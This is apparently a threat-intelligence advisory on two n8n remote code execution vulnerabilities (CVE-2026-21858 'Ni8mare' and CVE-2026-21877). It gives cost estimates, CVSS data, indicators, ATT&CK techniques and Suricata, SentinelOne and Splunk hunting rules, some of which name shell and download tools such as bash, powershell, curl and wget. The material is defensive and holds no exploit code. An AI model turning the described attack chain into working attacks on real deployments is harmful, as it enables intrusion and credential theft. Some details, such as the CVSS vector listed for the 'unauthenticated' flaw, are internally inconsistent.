BLUF

A maximum-severity vulnerability in the n8n open-source automation tool, nicknamed "Ni8mare", allows unauthenticated or authenticated attackers to fully compromise vulnerable deployments via Remote Code Execution (RCE). Active exploitation in the wild for the unauthenticated version (CVE-2026-21858) is raising concerns, while the authenticated RCE (CVE-2026-21877) is also a major risk.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by exploitation or suspected compromise of vulnerable n8n automation deployments (CVE-2026-21858 and CVE-2026-21877):

• Low-end total cost: $900,000 – $1.4M
  (Rapid detection, limited exposure, minimal downstream workflow abuse)

• Typical expected range: $1.8M – $3.2M
  (Confirmed RCE, credential exposure, broad workflow validation and rebuild required)

• Upper-bound realistic scenarios: $3.5M – $5.5M
  (Internet-exposed automation, lateral movement into integrated systems, regulatory involvement)

Key cost driver:

Costs are driven less by immediate system outages and more by loss of trust in automation integrity. Remote code execution within orchestration platforms forces organizations to assume credential compromise, validate every connected workflow, and reassess the security of downstream integrations—extending recovery timelines and significantly increasing assurance, compliance, and governance costs well beyond initial containment.

Potential Affected Sectors

·         Any organization using n8n for automation, particularly those with internet-exposed instances.

Potential Affected Countries

·         Global

Date of First Reported Activity

·         January 8, 2026

Date of Last Reported Activity Update

·         January 8, 2026.

CVEs and CVSS Vectors

CVE-2026-21858

CVSS 3.1 Vector

·         (9.9) AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Nessus ID

·         115105

Is this on the KEV list?

Not at this time

What is the patch date for CVE-2026-21858

·         Not applicable at this time

URL Link to Patch

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg

CVE-2026-21877

Authenticated RCE

CVSS 3.1 Vector

·         (9.9) AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Nessus ID

·         115104

Is this on the KEV list?

·         Not at this time

What is the patch date for CVE-2026-21877

·         Not applicable at this time

URL Link to Patch

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263

APT Names

·         No APT groups have been associated with CVE-2026-21858 or CVE-2026-21877 at this time.

Associated Criminal Organization Names

·         No criminal organizations have been associated with CVE-2026-21858 or CVE-2026-21877 at this time.

IOCs

CVE-2026-21858 (Ni8mare)

Behavioral Indicators:

·         Inbound Requests

o   Watch for unusual Content-Type headers in requests directed at /webhook/ endpoints designed to override internal request parsing.

·         File Access

o   Unauthorized attempts to access sensitive local files (e.g., n8n configuration files, authentication secrets) via manipulated file upload parsers.

·         Session Forgery

o   Unexpected administrative logins or session creation without valid credentials, as the flaw allows for forging admin sessions.

CVE-2026-21877

Behavioral Indicators

·         Unauthorized Command Execution Execution of system commands (CWE-94) originating from legitimate-appearing automation workflows.

·         Node Abuse High activity or unusual configurations involving the "Git node" by non-admin users.

Tools Used in Campaign

·         No information available in OS

TTPs

CVE-2026-21858

·         T1190 Exploit Public-Facing Application

o   Attackers exploit the webhook endpoint via specially crafted HTTP requests to bypass initial security checks.

·         T1083 File and Directory Discovery

o   The flaw allows unauthenticated remote attackers to read arbitrary local files from the server, such as SQLite databases and configuration files.

·         T1550.002 Use Alternate Authentication Material Pass the Hash/Ticket

o   Attackers use extracted session secrets to forge administrator sessions.

·         T1059 Command and Scripting Interpreter

o   Final exploitation results in arbitrary command execution on the host system.

·         T1021 Remote Services

o   Successful exploitation often leads to lateral movement into connected services like cloud storage or internal APIs.

CVE-2026-21877

·         T1078 Valid Accounts

o   Exploitation requires an authenticated user to perform the initial actions.

·         T1222 File and Directory Permissions Modification

o   The vulnerability stems from an arbitrary file write condition, allowing users to modify or create files on the server.

·         T1059 Command and Scripting Interpreter

o   Authenticated users abuse the Git node to execute malicious code with the privileges of the n8n service.

·         T1534 Internal Spearphishing

o   (Impact-based) Attackers may use the compromised automation platform to send malicious messages or data through integrated communication channels

Malware Names

·         None reported at this time

Suggested Rules / suggested hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata

CVE-2026-21858 (Unauthenticated RCE):

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT n8n Content-Type Confusion (CVE-2026-21858)"; flow:established,to_server; content:"POST"; http_method; content:"/webhook/"; http_uri; content:"Content-Type|3a|"; http_header; pcre:"/Content-Type\s*:\s*(?!multipart\/form-data).*/Hi"; content:"multipart/form-data"; http_client_body; reference:cve,2026-21858; classtype:attempted-admin; sid:202621858; rev:1;)

SentinelOne

Endpoint/Process Hunting Suspicious Child Process

SQL

EndpointName contains "*" AND ProcessName = "node" AND CommandLine contains "n8n" AND (ChildProcessName in ("cmd.exe", "powershell.exe", "sh", "bash") OR ChildProcessName contains "curl" OR ChildProcessName contains "wget")

Arbitrary File Write (CVE-2026-21877)

Hunts for n8n writing to sensitive locations or executable paths.

SQL

ProcessName = "node" AND CommandLine contains "n8n" AND FilePathMatch ("*/.n8n/*", "*/etc/*", "*/var/www/*", "*.sh", "*.py") AND FileActionType = "Write"

Use code with caution.

Splunk

Since exploitation involves manipulating webhooks and file handling logic, monitor web server logs for suspicious headers and patterns.

Hunt for Content-Type Mismatches (CVE-2026-21858):

index=web sourcetype=access_combined uri_path="*/webhook/*" method=POST

| where NOT match(content_type, "(?i)multipart/form-data") AND match(_raw, "form-data; name=")

| stats count by src_ip, uri_path, user_agent

Hunt for Suspicious Workflow Edits (CVE-2026-21877)

Monitor audit logs for unexpected workflow modifications followed by RCE-like behavior.

index=n8n_logs (message="*workflow updated*" OR message="*credential updated*")

| transaction user startsWith="workflow updated" endsWith="node execution" maxspan=5m

| table _time, user, workflow_id, command

Delivery Method

·         Network exploitation

Email Samples

·         Not applicable

References

NVD

·         hxxps://nvd.nist.gov/vuln/detail/CVE-2026-21858

·         hxxps://nvd.nist.gov/vuln/detail/CVE-2026-21877

GitHub

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263